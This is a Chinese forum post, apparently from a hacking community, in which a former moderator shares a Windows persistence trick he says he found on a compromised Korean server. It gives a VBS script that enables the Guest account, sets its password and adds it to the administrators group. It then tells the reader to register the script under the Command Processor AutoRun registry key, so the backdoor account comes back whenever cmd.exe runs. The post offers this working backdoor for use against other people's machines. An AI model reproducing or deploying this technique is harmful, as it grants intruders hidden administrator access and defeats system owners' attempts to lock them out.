首先自我检讨一下,做斑竹做到卸任 辜负黑海的期望了。。。
:18:
前段时间弄台韩国服务器上发现的,貌似是比较早的技术了。
先来个vbs,内容如下
dim wsh
set wsh=createobject("wscript.shell")
wsh.run "net user guest /active:yes",0
wsh.run "net user guest liumanshequ",0
wsh.run "net localgroup administrators guest /add",0
然后打开注册表修改注册标里面的:
HKEY_LOCAL_MACHINE\Software\Microsoft\Command processor\autorun
在键值里面加入你vbs文件的路径就ok了,然后运行vbs文件,不死账号出来拉。
如果管理员把你动过手脚的guest账号停了,当时他运行cmd的时候又自动启动了guest账号,因为上面的修改已经让我们的vbs文件和cmd.exe 产生了关联运行cmd他就找到注册表里面的路径运行那vbs文件。 |
